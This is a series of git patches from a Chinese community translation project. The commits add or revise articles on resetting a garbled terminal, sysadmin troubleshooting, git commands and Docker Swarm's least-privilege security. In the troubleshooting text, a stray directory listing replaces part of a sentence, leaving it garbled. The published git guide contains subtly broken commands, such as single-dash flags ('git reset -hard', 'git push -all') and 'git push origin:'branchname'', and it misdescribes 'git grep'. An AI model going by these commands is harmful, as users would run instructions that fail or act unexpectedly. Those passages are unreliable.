-作者:[jonico ][a] +作者:[jonico][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 4c3e028c2c15ea8cfa41d7c634ba18d59b932688 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 26 Dec 2017 14:40:37 +0800 Subject: [PATCH 0792/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Fix=20The=20Dis?= =?UTF-8?q?play=20and=20Console=20Gibberish=20on=20a=20Linux=20/=20Unix=20?= =?UTF-8?q?/=20OS=20X=20/=20BSD=20Systems?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... on a Linux - Unix - OS X - BSD Systems.md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md diff --git a/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md b/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md new file mode 100644 index 0000000000..426991c91a --- /dev/null +++ b/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md @@ -0,0 +1,56 @@ +translating by lujun9972 +Fix The Display and Console Gibberish on a Linux / Unix / OS X / BSD Systems +====== +Sometimes my R & D result in the weird output on the screen. For example, accidentally I run cat command over binary file - cat /sbin/*. You will be not able to access your bash/ksh/zsh based terminal. It will be full of wired character sequences that can lock down your display. These characters will hide what you type or character displayed into strange symbols. To clear gibberish all over the screen use the following method. This article describes how to really clear the terminal screen or reset terminal in Linux or Unix-like system. + + +## The clear command + +The clear command clears your screen including its scrollback buffer. +`$ clear` +You can press CTRL+L to clear screen too. However, clear command won't clear the terminal screen. Use the following methods to really clear the terminal so you get a get back a good working terminal. + +## How to fix the display using the rest command + +Here is my console with gibberish all over the screen: +[![Fig.01: Bash fix the display][1]][2] + +To fix the display just type the reset command. It will initialization terminal again for you: +`$ reset` +OR +`$ tput reset` + +If reset command failed to work type the following command to restore the session to a normal state: +`$ stty sane` + +Press CTRL + L to clear the screen (or type the clear command): +`$ clear` + +## Use ANSI escape sequence to really clear the bash terminal + +Another option is to type the following ANSI escape sequence: +``` +clear +echo -e "\033c" +``` + +Sample outputs from both commands: +[![Animated gif 01: Fix Unix Console Gibberish Command Demo][3]][4] +Read man pages of stty and reset for more information stty(1),reset(1),bash(1) + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/tips/bash-fix-the-display.html + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/media/new/tips/2006/08/bash-fix-terminal.png +[2]:https://www.cyberciti.biz/media/uploads/tips/2006/08/bash-fix-terminal.png +[3]:https://www.cyberciti.biz/media/new/tips/2006/08/unix-linux-console-gibberish.gif +[4]:https://www.cyberciti.biz/tips/bash-fix-the-display.html/unix-linux-console-gibberish From 8ea29421ffba39c369d3b3108f555a1bfd706de8 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 26 Dec 2017 14:41:48 +0800 Subject: [PATCH 0793/1627] =?UTF-8?q?add=20done=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2026=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=BA=8C=2014:41:4?= =?UTF-8?q?8=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... on a Linux - Unix - OS X - BSD Systems.md | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md b/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md index 426991c91a..436e143f82 100644 --- a/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md +++ b/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md @@ -1,42 +1,42 @@ translating by lujun9972 Fix The Display and Console Gibberish on a Linux / Unix / OS X / BSD Systems ====== -Sometimes my R & D result in the weird output on the screen. For example, accidentally I run cat command over binary file - cat /sbin/*. You will be not able to access your bash/ksh/zsh based terminal. It will be full of wired character sequences that can lock down your display. These characters will hide what you type or character displayed into strange symbols. To clear gibberish all over the screen use the following method. This article describes how to really clear the terminal screen or reset terminal in Linux or Unix-like system. +Sometimes my R & D result in the weird output on the screen。For example,accidentally I run cat command over binary file - cat /sbin/*。You will be not able to access your bash/ksh/zsh based terminal。It will be full of wired character sequences that can lock down your display。These characters will hide what you type or character displayed into strange symbols。To clear gibberish all over the screen use the following method。This article describes how to really clear the terminal screen or reset terminal in Linux or Unix-like system。 ## The clear command -The clear command clears your screen including its scrollback buffer. +The clear command clears your screen including its scrollback buffer。 `$ clear` -You can press CTRL+L to clear screen too. However, clear command won't clear the terminal screen. Use the following methods to really clear the terminal so you get a get back a good working terminal. +You can press CTRL+L to clear screen too。However,clear command won't clear the terminal screen。Use the following methods to really clear the terminal so you get a get back a good working terminal。 ## How to fix the display using the rest command -Here is my console with gibberish all over the screen: -[![Fig.01: Bash fix the display][1]][2] +Here is my console with gibberish all over the screen: +[![Fig.01:Bash fix the display][1]][2] -To fix the display just type the reset command. It will initialization terminal again for you: +To fix the display just type the reset command。It will initialization terminal again for you: `$ reset` OR `$ tput reset` -If reset command failed to work type the following command to restore the session to a normal state: +If reset command failed to work type the following command to restore the session to a normal state: `$ stty sane` -Press CTRL + L to clear the screen (or type the clear command): +Press CTRL + L to clear the screen (or type the clear command): `$ clear` ## Use ANSI escape sequence to really clear the bash terminal -Another option is to type the following ANSI escape sequence: +Another option is to type the following ANSI escape sequence: ``` clear echo -e "\033c" ``` -Sample outputs from both commands: -[![Animated gif 01: Fix Unix Console Gibberish Command Demo][3]][4] -Read man pages of stty and reset for more information stty(1),reset(1),bash(1) +Sample outputs from both commands: +[![Animated gif 01:Fix Unix Console Gibberish Command Demo][3]][4] +Read man pages of stty and reset for more information stty(1),reset(1),bash(1) -------------------------------------------------------------------------------- From eba3f541f17f5da83de9ea0c2d7be857892cadbe Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 26 Dec 2017 15:08:18 +0800 Subject: [PATCH 0794/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Sysadmin=20101:?= =?UTF-8?q?=20Troubleshooting?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171216 Sysadmin 101- Troubleshooting.md | 124 ++++++++++++++++++ 1 file changed, 124 insertions(+) create mode 100644 sources/tech/20171216 Sysadmin 101- Troubleshooting.md diff --git a/sources/tech/20171216 Sysadmin 101- Troubleshooting.md b/sources/tech/20171216 Sysadmin 101- Troubleshooting.md new file mode 100644 index 0000000000..89cb5925c7 --- /dev/null +++ b/sources/tech/20171216 Sysadmin 101- Troubleshooting.md @@ -0,0 +1,124 @@ +translating by lujun9972 +Sysadmin 101: Troubleshooting +====== +I typically keep this blog strictly technical, keeping observations, opinions and the like to a minimum. But this, and the next few posts will be about basics and fundamentals for starting out in system administration/SRE/system engineer/sysops/devops-ops (whatever you want to call yourself) roles more generally. +Bear with me! + +"My web site is slow" + +I just picked the type of issue for this article at random, this can be applied to pretty much any sysadmin related troubleshooting. It's not about showing off the cleverest oneliners to find the most information. It's also not an exhaustive, step-by-step "flowchart" with the word "profit" in the last box. It's about general approach, by means of a few examples. +The example scenarios are solely for illustrative purposes. They sometimes have a basis in assumptions that doesn't apply to all cases all of the time, and I'm positive many readers will go "oh, but I think you will find…" at some point. +But that would be missing the point. + +Having worked in support, or within a support organization for over a decade, there is one thing that strikes me time and time again and that made me write this; +**The instinctive reaction many techs have when facing a problem, is to start throwing potential solutions at it.** + +"My website is slow" + + * I'm going to try upping `MaxClients/MaxRequestWorkers/worker_connections` + * I'm going to try to increase `innodb_buffer_pool_size/effective_cache_size` + * I'm going to try to enable `mod_gzip` (true story, sadly) + + + +"I saw this issue once, and then it was because X. So I'm going to try to fix X again, it might work". + +This wastes a lot of time, and leads you down a wild goose chase. In the dark. Wearing greased mittens. +InnoDB's buffer pool may well be at 100% utilization, but that's just because there are remnants of a large one-off report someone ran a while back in there. If there are no evictions, you've just wasted time. + +### Quick side-bar before we start + +At this point, I should mention that while it's equally applicable to many roles, I'm writing this from a general support system adminstrator's point of view. In a mature, in-house organization or when working with larger, fully managed or "enterprise" customers, you'll typically have everything instrumented, measured, graphed, thresheld (not even word) and alerted on. Then your approach will often be rather different. We're going in blind here. + +If you don't have that sort of thing at your disposal; + +### Clarify and First look + +Establish what the issue actually is. "Slow" can take many forms. Is it time to first byte? That's a whole different class of problem from poor Javascript loading and pulling down 15 MB of static assets on each page load. Is it slow, or just slower than it usually is? Two very different plans of attack! + +Make sure you know what the issue reported/experienced actually is before you go off and do something. Finding the source of the problem is often difficult enough, without also having to find the problem itself. +That is the sysadmin equivalent of bringing a knife to a gunfight. + +### Low hanging fruit / gimmies + +You are allowed to look for a few usual suspects when you first log in to a suspect server. In fact, you should! I tend to fire off a smattering of commands whenever I log in to a server to just very quickly check a few things; Are we swapping (`free/vmstat`), are the disks busy (`top/iostat/iotop`), are we dropping packets (`netstat/proc/net/dev`), is there an undue amount of connections in an undue state (`netstat`), is something hogging the CPUs (`top`), is someone else on this server (`w/who`), any eye-catching messages in syslog and `dmesg`? + +There's little point to carrying on if you have 2000 messages from your RAID controller about how unhappy it is with its write-through cache. + +This doesn't have to take more than half a minute. If nothing catches your eye - continue. + +### Reproduce + +If there indeed is a problem somewhere, and there's no low hanging fruit to be found; + +Take all steps you can to try and reproduce the problem. When you can reproduce, you can observe. **When you can observe, you can solve.** Ask the person reporting the issue what exact steps to take to reproduce the issue if it isn 't already obvious or covered by the first section. + +Now, for issues caused by solar flares and clients running exclusively on OS/2, it's not always feasible to reproduce. But your first port of call should be to at least try! In the very beginning, all you know is "X thinks their website is slow". For all you know at that point, they could be tethered to their GPRS mobile phone and applying Windows updates. Delving any deeper than we already have at that point is, again, a waste of time. + +Attempt to reproduce! + +### Check the log! + +It saddens me that I felt the need to include this. But I've seen escalations that ended mere minutes after someone ran `tail /var/log/..` Most *NIX tools these days are pretty good at logging. Anything blatantly wrong will manifest itself quite prominently in most application logs. Check it. + +### Narrow down + +If there are no obvious issues, but you can reproduce the reported problem, great. So, you know the website is slow. Now you've narrowed things down to: Browser rendering/bug, application code, DNS infrastructure, router, firewall, NICs (all eight+ involved), ethernet cables, load balancer, database, caching layer, session storage, web server software, application server, RAM, CPU, RAID card, disks. +Add a smattering of other potential culprits depending on the set-up. It could be the SAN, too. And don't forget about the hardware WAF! And.. you get my point. + +If the issue is time-to-first-byte you'll of course start applying known fixes to the webserver, that's the one responding slowly and what you know the most about, right? Wrong! +You go back to trying to reproduce the issue. Only this time, you try to eliminate as many potential sources of issues as possible. + +You can eliminate the vast majority of potential culprits very easily: Can you reproduce the issue locally from the server(s)? Congratulations, you've just saved yourself having to try your fixes for BGP routing. +If you can't, try from another machine on the same network. If you can - at least you can move the firewall down your list of suspects, (but do keep a suspicious eye on that switch!) + +Are all connections slow? Just because the server is a web server, doesn't mean you shouldn't try to reproduce with another type of service. [netcat][1] is very useful in these scenarios (but chances are your SSH connection would have been lagging this whole time, as a clue)! If that's also slow, you at least know you've most likely got a networking problem and can disregard the entire web stack and all its components. Start from the top again with this knowledge (do not collect $200). Work your way from the inside-out! + +Even if you can reproduce locally - there's still a whole lot of "stuff" left. Let's remove a few more variables. Can you reproduce it with a flat-file? If `i_am_a_1kb_file.html` is slow, you know it's not your DB, caching layer or anything beyond the OS and the webserver itself. +Can you reproduce with an interpreted/executed `hello_world.(py|php|js|rb..)` file? If you can, you've narrowed things down considerably, and you can focus on just a handful of things. If `hello_world` is served instantly, you've still learned a lot! You know there aren't any blatant resource constraints, any full queues or stuck IPC calls anywhere. So it's something the application is doing or something it's communicating with. + +Are all pages slow? Or just the ones loading the "Live scores feed" from a third party? + +**What this boils down to is; What 's the smallest amount of "stuff" that you can involve, and still reproduce the issue?** + +Our example is a slow web site, but this is equally applicable to almost any issue. Mail delivery? Can you deliver locally? To yourself? To ? Test with small, plaintext messages. Work your way up to the 2MB campaign blast. STARTTLS and no STARTTLS. Work your way from the inside-out. + +Each one of these steps takes mere seconds each, far quicker than implementing most "potential" fixes. + +### Observe / isolate + +By now, you may already have stumbled across the problem by virtue of being unable to reproduce when you removed a particular component. + +But if you haven't, or you still don't know **why** ; Once you've found a way to reproduce the issue with the smallest amount of "stuff" (technical term) between you and the issue, it's time to start isolating and observing. + +Bear in mind that many services can be ran in the foreground, and/or have debugging enabled. For certain classes of issues, it is often hugely helpful to do this. + +Here's also where your traditional armory comes into play. `strace`, `lsof`, `netstat`, `GDB`, `iotop`, `valgrind`, language profilers (cProfile, xdebug, ruby-prof…). Those types of tools. + +Once you've come this far, you rarely end up having to break out profilers or debugers though. + +[`strace`][2] is often a very good place to start. +You might notice that the application is stuck on a particular `read()` call on a socket file descriptor connected to port 3306 somewhere. You'll know what to do. +Move on to MySQL and start from the top again. Low hanging fruit: "Waiting_for comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md lock", deadlocks, max_connections.. Move on to: All queries? Only writes? Only certain tables? Only certain storage engines?… + +You might notice that there's a `connect()` to an external API resource that takes five seconds to complete, or even times out. You'll know what to do. + +You might notice that there are 1000 calls to `fstat()` and `open()` on the same couple of files as part of a circular dependency somewhere. You'll know what to do. + +It might not be any of those particular things, but I promise you, you'll notice something. + +If you're only going to take one thing from this section, let it be; learn to use `strace`! **Really** learn it, read the whole man page. Don 't even skip the HISTORY section. `man` each syscall you don't already know what it does. 98% of troubleshooting sessions ends with strace. + +-------------------------------------------------------------------------------- + +via: http://northernmost.org/blog/troubleshooting-101/index.html + +作者:[Erik Ljungstrom][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://northernmost.org +[1]:http://nc110.sourceforge.net/ +[2]:https://linux.die.net/man/1/strace From 624967225d138bc6848cb5d36a2f805b3890a480 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 26 Dec 2017 15:34:05 +0800 Subject: [PATCH 0795/1627] PRF&PUB:20170730 Complete Beginners to PRO guide for GIT commands.md @liuxinyu123 --- ...Beginners to PRO guide for GIT commands.md | 257 ++++++++++++------ 1 file changed, 169 insertions(+), 88 deletions(-) rename {translated/tech => published}/20170730 Complete Beginners to PRO guide for GIT commands.md (51%) diff --git a/translated/tech/20170730 Complete Beginners to PRO guide for GIT commands.md b/published/20170730 Complete Beginners to PRO guide for GIT commands.md similarity index 51% rename from translated/tech/20170730 Complete Beginners to PRO guide for GIT commands.md rename to published/20170730 Complete Beginners to PRO guide for GIT commands.md index 33423f1b7d..8831dc432f 100644 --- a/translated/tech/20170730 Complete Beginners to PRO guide for GIT commands.md +++ b/published/20170730 Complete Beginners to PRO guide for GIT commands.md @@ -1,154 +1,235 @@ -GIT 命令"从初学到专业"完整进阶指南 -=========== +GIT 命令“从初学到专业”完整进阶指南 +=========== + +在[之前的教程][1]中,我们已经学习了在机器上安装 git。本教程,我们将讨论如何使用 git,比如与 git 一起使用的各种命令。所以我们开始吧, + +- 推荐阅读:[如何在 Linux 上安装 GIT (Ubuntu 和 CentOS)][1] + +### 设置用户信息 + +这应该是安装完 git 的第一步。我们将添加用户信息 (用户名和邮箱),所以当我们提交代码时,会产生带有用户信息的提交信息,这使得跟踪提交过程变得更容易。要添加用户信息,命令是 `git config`: -在[之前的教程][1]中,我们已经学习了在机器上安装 git。本教程,我们将讨论如何使用 git,比如与 git 一起使用的各种命令。所以我们开始吧, -(**推荐阅读:[如何在 Linux 上安装 GIT (Ubuntu 和 CentOS)][1]**) -### 设置用户信息 -这应该是安装完 git 的第一步。我们将添加用户信息 (用户名和邮箱),所以当我们提交代码时,会产生带有用户信息的提交信息,这使得跟踪提交过程变得更容易。为了添加用户信息,命令是 `git config`, ``` $ git config --global user.name "Daniel" $ git config --global user.email "dan.mike@xyz.com" ``` -添加完用户信息之后,通过运行下面命令,我们将检查这些信息是否成功更新, + +添加完用户信息之后,通过运行下面命令,我们将检查这些信息是否成功更新。 + ``` $ git config --list ``` -并且我们应该能够看到输出的用户信息。 -(**我们也应该读一下:[使用 CRONTAB 来安排重要的工作][3]**) -### GIT 命令 -#### 新建一个仓库 -为了建立一个新仓库,运行如下命令, + +我们应该能够看到输出的用户信息。 + +### GIT 命令 +#### 新建一个仓库 + +为了建立一个新仓库,运行如下命令: + ``` $ git init -``` -#### 查找一个仓库 -为了查找一个仓库,命令如下, +``` + +#### 查找一个仓库 + +为了查找一个仓库,命令如下: + ``` $ git grep "repository" -``` -#### 与远程仓库连接 -为了与远程仓库连接,运行如下命令, +``` + +#### 与远程仓库连接 + +为了与远程仓库连接,运行如下命令: + ``` $ git remote add origin remote_server -``` -然后检查所有配置的远程服务器,运行如下命令, +``` + +然后检查所有配置的远程服务器,运行如下命令: + ``` $ git remote -v -``` -#### 克隆一个仓库 -为了从本地服务器克隆一个仓库,运行如下代码, +``` + +#### 克隆一个仓库 + +为了从本地服务器克隆一个仓库,运行如下代码: + ``` $ git clone repository_path -``` -如果我们想克隆远程服务器上的一个仓库,那克隆这个仓库的命令是, +``` + +如果我们想克隆远程服务器上的一个仓库,那克隆这个仓库的命令是: + ``` $ git clone repository_path -``` -#### 在仓库中列出分支 -为了检查所有可用的和当前工作的分支列表,执行 +``` + +#### 在仓库中列出分支 + +为了检查所有可用的和当前工作的分支列表,执行: + ``` $ git branch -``` -#### 创建新分支 -创建并使用一个新分支,命令是 +``` + +#### 创建新分支 + +创建并使用一个新分支,命令是: + ``` $ git checkout -b 'branchname' -``` -#### 删除一个分支 -为了删除一个分支,执行 +``` + +#### 删除一个分支 + +为了删除一个分支,执行: + ``` $ git branch -d 'branchname' -``` -为了删除远程仓库的一个分支,执行 +``` + +为了删除远程仓库的一个分支,执行: + ``` $ git push origin:'branchname' -``` -#### 切换到另一个分支 -从当前分支切换到另一个分支,使用 +``` + +#### 切换到另一个分支 + +从当前分支切换到另一个分支,使用 + ``` $ git checkout 'branchname' -``` -#### 添加文件 -添加文件到仓库,执行 +``` + +#### 添加文件 + +添加文件到仓库,执行: + ``` $ git add filename -``` -#### 文件状态 -检查文件状态 (那些将要提交或者添加的文件),执行 +``` + +#### 文件状态 + +检查文件状态 (那些将要提交或者添加的文件),执行: + ``` $ git status -``` -#### 提交变更 -在我们添加一个文件或者对一个文件作出变更之后,我们通过运行下面命令来提交代码, +``` + +#### 提交变更 + +在我们添加一个文件或者对一个文件作出变更之后,我们通过运行下面命令来提交代码: + ``` $ git commit -a -``` -提交变更到 head 并且不提交到远程仓库,命令是, +``` + +提交变更到 head 但不提交到远程仓库,命令是: + ``` $ git commit -m "message" -``` -#### 推送变更 -推送对该仓库 master 分支所做的变更,运行 +``` + +#### 推送变更 + +推送对该仓库 master 分支所做的变更,运行: + ``` $ git push origin master -``` -#### 推送分支到仓库 -推送对单分支做出的变更到远程仓库,运行 +``` + +#### 推送分支到仓库 + +推送对单一分支做出的变更到远程仓库,运行: + ``` $ git push origin 'branchname' -``` -推送所有分支到远程仓库,运行 +``` + +推送所有分支到远程仓库,运行: + ``` $ git push -all origin -``` -#### 合并两个分支 -合并另一个分支到当前活动分支,使用命令 +``` + +#### 合并两个分支 + +合并另一个分支到当前活动分支,使用命令: + ``` $ git merge 'branchname' -``` -#### 从远端服务器合并到本地服务器 -从远端服务器下载/拉取变更到到本地服务器的工作目录,运行 +``` + +#### 从远端服务器合并到本地服务器 + +从远端服务器下载/拉取变更到到本地服务器的工作目录,运行: + ``` $ git pull -``` -#### 检查合并冲突 -查看对库文件的合并冲突,运行 +``` + +#### 检查合并冲突 + +查看对库文件的合并冲突,运行: + ``` $ git diff -base 'filename' -``` -查看所有冲突,运行 +``` + +查看所有冲突,运行: + ``` $ git diff -``` -如果我们在合并之前想预览所有变更,运行 +``` + +如果我们在合并之前想预览所有变更,运行: + ``` $ git diff 'source-branch' 'target-branch' -``` -#### 创建标记 -创建标记来标志任一重要的变更,运行 +``` + +#### 创建标记 + +创建标记来标志任一重要的变更,运行: + ``` $ git tag 'tag number' 'commit id' -``` -通过运行以下命令,我们可以查找 commit id +``` + +通过运行以下命令,我们可以查找 commit id : + ``` $ git log -``` -#### 推送标记 -推送所有创建的标记到远端服务器,运行 +``` +#### 推送标记 + +推送所有创建的标记到远端服务器,运行: + ``` $ git push -tags origin -``` -#### 回复做出的变更 -如果我们想用 head 中最后一次变更来替换对当前工作树的变更,运行 +``` + +#### 回复做出的变更 + +如果我们想用 head 中最后一次变更来替换对当前工作树的变更,运行: + ``` $ git checkout -'filename' -``` -我们也可以从远端服务器获取最新的历史,并且将它指向本地仓库的 master 分支,而不是丢弃掉所有本地所做所有变更。为了这么做,运行 ``` -$ git fetch origin + +我们也可以从远端服务器获取最新的历史,并且将它指向本地仓库的 master 分支,而不是丢弃掉所有本地所做所有变更。为了这么做,运行: + +``` +$ git fetch origin $ git reset -hard master -``` -好了,伙计们。这些就是我们使用 git 服务器的命令。我们将会很快为大家带来更有趣的教程。如果你希望我们对某个特定话题写一个教程,请通过下面的评论箱告诉我们。像往常一样,您的意见和建议都是受欢迎的。 +``` + +好了,伙计们。这些就是我们使用 git 服务器的命令。我们将会很快为大家带来更有趣的教程。如果你希望我们对某个特定话题写一个教程,请通过下面的评论箱告诉我们。像往常一样, 欢迎您的各种意见和建议。 -------------------------------------------------------------------------------- @@ -156,7 +237,7 @@ via: http://linuxtechlab.com/beginners-to-pro-guide-for-git-commands/ 作者:[Shusain][a] 译者:[liuxinyu123](https://github.com/liuxinyu123) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 36de244d4891927eeddacfa79b812c73d8955b6c Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 26 Dec 2017 17:24:25 +0800 Subject: [PATCH 0796/1627] Translated by qhwdw --- ...LEAST PRIVILEGE CONTAINER ORCHESTRATION.md | 177 ------------------ ...LEAST PRIVILEGE CONTAINER ORCHESTRATION.md | 176 +++++++++++++++++ 2 files changed, 176 insertions(+), 177 deletions(-) delete mode 100644 sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md create mode 100644 translated/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md diff --git a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md deleted file mode 100644 index 42a3363ce3..0000000000 --- a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md +++ /dev/null @@ -1,177 +0,0 @@ -Translating by qhwdw -# LEAST PRIVILEGE CONTAINER ORCHESTRATION - - -The Docker platform and the container has become the standard for packaging, deploying, and managing applications. In order to coordinate running containers across multiple nodes in a cluster, a key capability is required: a container orchestrator. - -![container orchestrator](https://i0.wp.com/blog.docker.com/wp-content/uploads/f753d4e8-9e22-4fe2-be9a-80661ef696a8-3.jpg?resize=536%2C312&ssl=1) - -Orchestrators are responsible for critical clustering and scheduling tasks, such as: - -* Managing container scheduling and resource allocation. - -* Support service discovery and hitless application deploys. - -* Distribute the necessary resources that applications need to run. - -Unfortunately, the distributed nature of orchestrators and the ephemeral nature of resources in this environment makes securing orchestrators a challenging task. In this post, we will describe in detail the less-considered—yet vital—aspect of the security model of container orchestrators, and how Docker Enterprise Edition with its built-in orchestration capability, Swarm mode, overcomes these difficulties. - -Motivation and threat model -============================================================ - -One of the primary objectives of Docker EE with swarm mode is to provide an orchestrator with security built-in. To achieve this goal, we developed the first container orchestrator designed with the principle of least privilege in mind. - -In computer science,the principle of least privilege in a distributed system requires that each participant of the system must only have access to  the information and resources that are necessary for its legitimate purpose. No more, no less. - -> #### ”A process must be able to access only the information and resources that are necessary for its legitimate purpose.” - -#### Principle of Least Privilege - -Each node in a Docker EE swarm is assigned role: either manager or worker. These roles define a coarsegrained level of privilege to the nodes: administration and task execution, respectively. However, regardless of its role, a node has access only to the information and resources it needs to perform the necessary tasks, with cryptographically enforced guarantees. As a result, it becomes easier to secure clusters against even the most sophisticated attacker models: attackers that control the underlying communication networks or even compromised cluster nodes. - -# Secure-by-default core - -There is an old security maxim that states: if it doesn’t come by default, no one will use it. Docker Swarm mode takes this notion to heart, and ships with secure-by-default mechanisms to solve three of the hardest and most important aspects of the orchestration lifecycle: - -1. Trust bootstrap and node introduction. - -2. Node identity issuance and management. - -3. Authenticated, Authorized, Encrypted information storage and dissemination. - -Let’s look at each of these aspects individually - -### Trust Bootstrap and Node Introduction - -The first step to a secure cluster is tight control over membership and identity. Without it, administrators cannot rely on the identities of their nodes and enforce strict workload separation between nodes. This means that unauthorized nodes can’t be allowed to join the cluster, and nodes that are already part of the cluster aren’t able to change identities, suddenly pretending to be another node. - -To address this need, nodes managed by Docker EE’s Swarm mode maintain strong, immutable identities. The desired properties are cryptographically guaranteed by using two key building-blocks: - -1. Secure join tokens for cluster membership. - -2. Unique identities embedded in certificates issued from a central certificate authority. - -### Joining the Swarm - -To join the swarm, a node needs a copy of a secure join token. The token is unique to each operational role within the cluster—there are currently two types of nodes: workers and managers. Due to this separation, a node with a copy of a worker token will not be allowed to join the cluster as a manager. The only way to get this special token is for a cluster administrator to interactively request it from the cluster’s manager through the swarm administration API. - -The token is securely and randomly generated, but it also has a special syntax that makes leaks of this token easier to detect: a special prefix that you can easily monitor for in your logs and repositories. Fortunately, even if a leak does occur, tokens are easy to rotate, and we recommend that you rotate them often—particularly in the case where your cluster will not be scaling up for a while. - -![Docker Swarm](https://i1.wp.com/blog.docker.com/wp-content/uploads/92d171d4-52c7-4702-8143-110c6f52017c-2.jpg?resize=547%2C208&ssl=1) - -### Bootstrapping trust - -As part of establishing its identity, a new node will ask for a new identity to be issued by any of the network managers. However, under our threat model, all communications can be intercepted by a third-party. This begs the question: how does a node know that it is talking to a legitimate manager? - -![Docker Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/94e3fef0-5bd2-4970-b9e9-25b566d926ad-2.jpg?resize=528%2C348&ssl=1) - -Fortunately, Docker has a built-in mechanism for preventing this from happening. The join token, which the host uses to join the swarm, includes a hash of the root CA’s certificate. The host can therefore use one-way TLS and use the hash to verify that it’s joining the right swarm: if the manager presents a certificate not signed by a CA that matches the hash, the node knows not to trust it. - -### Node identity issuance and management - -Identities in a swarm are embedded in x509 certificates held by each individual node. In a manifestation of the least privilege principle, the certificates’ private keys are restricted strictly to the hosts where they originate. In particular, managers do not have access to private keys of any certificate but their own. - -### Identity Issuance - -To receive their certificates without sharing their private keys, new hosts begin by issuing a certificate signing request (CSR), which the managers then convert into a certificate. This certificate now becomes the new host’s identity, making the node a full-fledged member of the swarm! - -#### -![](https://i0.wp.com/blog.docker.com/wp-content/uploads/415ae6cf-7e76-4ba8-9d84-6d49bf327d8f-2.jpg?resize=548%2C350&ssl=1) - -When used alongside with the secure bootstrapping mechanism, this mechanism for issuing identities to joining nodes is secure by default: all communicating parties are authenticated, authorized and no sensitive information is ever exchanged in clear-text. - -### Identity Renewal - -However, securely joining nodes to a swarm is only part of the story. To minimize the impact of leaked or stolen certificates and to remove the complexity of managing CRL lists, Swarm mode uses short-lived certificates for the identities. These certificates have a default expiration of three months, but can be configured to expire every hour! - -![Docker secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/55e2ab9a-19cd-465d-82c6-fa76110e7ecd-2.jpg?resize=556%2C365&ssl=1) - -This short certificate expiration time means that certificate rotation can’t be a manual process, as it usually is for most PKI systems. With swarm, all certificates are rotated automatically and in a hitless fashion. The process is simple: using a mutually authenticated TLS connection to prove ownership over a particular identity, a Swarm node generates regularly a new public/private key pair and sends the corresponding CSR to be signed, creating a completely new certificate, but maintaining the same identity. - -### Authenticated, Authorized, Encrypted information storage and dissemination. - -During the normal operation of a swarm, information about the tasks has to be sent to the worker nodes for execution. This includes not only information on which containers are to be executed by a node;but also, it includes  all the resources that are necessary for the successful execution of that container, including sensitive secrets such as private keys, passwords, and API tokens. - -### Transport Security - -The fact that every node participating in a swarm is in possession of a unique identity in the form of a X509 certificate, communicating securely between nodes is trivial: nodes can use their respective certificates to establish mutually authenticated connections between one another, inheriting the confidentiality, authenticity and integrity properties of TLS. - -![Swarm Mode](https://i0.wp.com/blog.docker.com/wp-content/uploads/972273a3-d9e5-4053-8fcb-a407c8cdcbf6-2.jpg?resize=347%2C271&ssl=1) - -One interesting detail about Swarm mode is the fact that it uses a push model: only managers are allowed to send information to workers—significantly reducing the surface of attack manager nodes expose to the less privileged worker nodes. - -### Strict Workload Separation Into Security Zones - -One of the responsibilities of manager nodes is deciding which tasks to send to each of the workers. Managers make this determination using a variety of strategies; scheduling the workloads across the swarm depending on both the unique properties of each node and each workload. - -In Docker EE with Swarm mode, administrators have the ability of influencing these scheduling decisions by using labels that 